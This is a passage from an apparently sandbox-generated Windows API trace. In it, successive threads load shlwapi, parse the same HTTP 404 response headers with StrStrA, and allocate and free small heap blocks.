lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 74 os_tid = 0xbb4 [0252.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.192] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.192] GetProcessHeap () returned 0x5b0000 [0252.192] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0252.192] GetProcessHeap () returned 0x5b0000 [0252.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0252.192] GetProcessHeap () returned 0x5b0000 [0252.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 75 os_tid = 0xb5c [0253.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0253.568] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.568] GetProcessHeap () returned 0x5b0000 [0253.568] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0253.569] GetProcessHeap () returned 0x5b0000 [0253.569] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0253.569] GetProcessHeap () returned 0x5b0000 [0253.569] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 76 os_tid = 0xa94 [0255.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0255.024] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:19 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.024] GetProcessHeap () returned 0x5b0000 [0255.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0255.024] GetProcessHeap () returned 0x5b0000 [0255.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0255.024] GetProcessHeap () returned 0x5b0000 [0255.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 77 os_tid = 0x424 [0256.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.282] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.282] GetProcessHeap () returned 0x5b0000 [0256.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0256.282] GetProcessHeap () returned 0x5b0000 [0256.282] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0256.283] GetProcessHeap () returned 0x5b0000 [0256.283] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 78 os_tid = 0xc10 [0257.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.935] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.935] GetProcessHeap () returned 0x5b0000 [0257.935] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0257.935] GetProcessHeap () returned 0x5b0000 [0257.935] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0257.935] GetProcessHeap () returned 0x5b0000 [0257.936] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 79 os_tid = 0xc14 [0259.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0259.684] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.685] GetProcessHeap () returned 0x5b0000 [0259.685] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0259.685] GetProcessHeap () returned 0x5b0000 [0259.685] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0259.685] GetProcessHeap () returned 0x5b0000 [0259.685] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 80 os_tid = 0xc18 [0261.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0261.075] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.075] GetProcessHeap () returned 0x5b0000 [0261.075] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0261.075] GetProcessHeap () returned 0x5b0000 [0261.075] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0261.075] GetProcessHeap () returned 0x5b0000 [0261.076] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 81 os_tid = 0xc1c [0262.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.373] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.373] GetProcessHeap () returned 0x5b0000 [0262.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0262.373] GetProcessHeap () returned 0x5b0000 [0262.373] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0262.373] GetProcessHeap () returned 0x5b0000 [0262.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 82 os_tid = 0xc20 [0263.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.742] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.742] GetProcessHeap () returned 0x5b0000 [0263.742] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0263.742] GetProcessHeap () returned 0x5b0000 [0263.742] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0263.742] GetProcessHeap () returned 0x5b0000 [0263.743] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 83 os_tid = 0xc24 [0265.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.111] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.111] GetProcessHeap () returned 0x5b0000 [0265.111] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0265.111] GetProcessHeap () returned 0x5b0000 [0265.111] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0265.111] GetProcessHeap () returned 0x5b0000 [0265.111] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 84 os_tid = 0xc28 [0266.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.523] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.523] GetProcessHeap () returned 0x5b0000 [0266.523] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0266.523] GetProcessHeap () returned 0x5b0000 [0266.523] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0266.523] GetProcessHeap () returned 0x5b0000 [0266.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 85 os_tid = 0xc2c [0267.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.873] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:32 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.873] GetProcessHeap () returned 0x5b0000 [0267.873] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0267.873] GetProcessHeap () returned 0x5b0000 [0267.873] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0267.873] GetProcessHeap () returned 0x5b0000 [0267.873] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 86 os_tid = 0xc30 [0269.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.639] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0269.639] GetProcessHeap () returned 0x5b0000 [0269.639] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0269.639] GetProcessHeap () returned 0x5b0000 [0269.639] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0269.639] GetProcessHeap () returned 0x5b0000 [0269.671] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 87 os_tid = 0xc34 [0271.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0271.192] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0271.192] GetProcessHeap () returned 0x5b0000 [0271.192] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0271.192] GetProcessHeap () returned 0x5b0000 [0271.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0271.192] GetProcessHeap () returned 0x5b0000 [0271.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 88 os_tid = 0xc38 [0272.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0272.607] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0272.607] GetProcessHeap () returned 0x5b0000 [0272.607] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0272.607] GetProcessHeap () returned 0x5b0000 [0272.607] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0272.607] GetProcessHeap () returned 0x5b0000 [0272.608] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 89 os_tid = 0xc3c [0273.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0273.991] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0273.991] GetProcessHeap () returned 0x5b0000 [0273.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0273.991] GetProcessHeap () returned 0x5b0000 [0273.992] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0273.992] GetProcessHeap () returned 0x5b0000 [0273.992] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 90 os_tid = 0xc40 [0275.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0275.284] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0275.284] GetProcessHeap () returned 0x5b0000 [0275.284] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0275.284] GetProcessHeap () returned 0x5b0000 [0275.284] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0275.284] GetProcessHeap () returned 0x5b0000 [0275.285] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 91 os_tid = 0xc44 [0276.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.785] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0276.785] GetProcessHeap () returned 0x5b0000 [0276.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0276.785] GetProcessHeap () returned 0x5b0000 [0276.785] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0276.786] GetProcessHeap () returned 0x5b0000 [0276.786] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 92 os_tid = 0xc48 [0278.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.105] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.106] GetProcessHeap () returned 0x5b0000 [0278.106] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0278.106] GetProcessHeap () returned 0x5b0000 [0278.106] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0278.106] GetProcessHeap () returned 0x5b0000 [0278.106] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 93 os_tid = 0xc4c [0279.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0279.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.583] GetProcessHeap () returned 0x5b0000 [0279.583] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0279.583] GetProcessHeap () returned 0x5b0000 [0279.583] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0279.583] GetProcessHeap () returned 0x5b0000 [0279.584] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 94 os_tid = 0xc50 [0281.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0281.301] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.301] GetProcessHeap () returned 0x5b0000 [0281.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0281.301] GetProcessHeap () returned 0x5b0000 [0281.301] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0281.301] GetProcessHeap () returned 0x5b0000 [0281.302] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 95 os_tid = 0xc54 [0282.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0282.777] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.777] GetProcessHeap () returned 0x5b0000 [0282.777] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0282.777] GetProcessHeap () returned 0x5b0000 [0282.777] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0282.777] GetProcessHeap () returned 0x5b0000 [0282.777] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 96 os_tid = 0xc58 [0284.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0284.221] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.221] GetProcessHeap () returned 0x5b0000 [0284.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0284.221] GetProcessHeap () returned 0x5b0000 [0284.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0284.221] GetProcessHeap () returned 0x5b0000 [0284.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 97 os_tid = 0xcbc [0285.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0285.748] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.748] GetProcessHeap () returned 0x5b0000 [0285.748] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0285.748] GetProcessHeap () returned 0x5b0000 [0285.748] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0285.748] GetProcessHeap () returned 0x5b0000 [0285.748] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 98 os_tid = 0xcc0 [0287.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0287.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.392] GetProcessHeap () returned 0x5b0000 [0287.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0287.392] GetProcessHeap () returned 0x5b0000 [0287.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0287.392] GetProcessHeap () returned 0x5b0000 [0287.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 99 os_tid = 0xcc4 [0288.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0288.883] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.883] GetProcessHeap () returned 0x5b0000 [0288.883] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0288.883] GetProcessHeap () returned 0x5b0000 [0288.883] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0288.883] GetProcessHeap () returned 0x5b0000 [0288.884] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 100 os_tid = 0xcc8 [0290.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0290.414] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:54 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.415] GetProcessHeap () returned 0x5b0000 [0290.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0290.415] GetProcessHeap () returned 0x5b0000 [0290.415] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0290.415] GetProcessHeap () returned 0x5b0000 [0290.415] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 101 os_tid = 0xccc [0292.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.044] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.044] GetProcessHeap () returned 0x5b0000 [0292.044] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0292.044] GetProcessHeap () returned 0x5b0000 [0292.044] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0292.044] GetProcessHeap () returned 0x5b0000 [0292.045] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 102 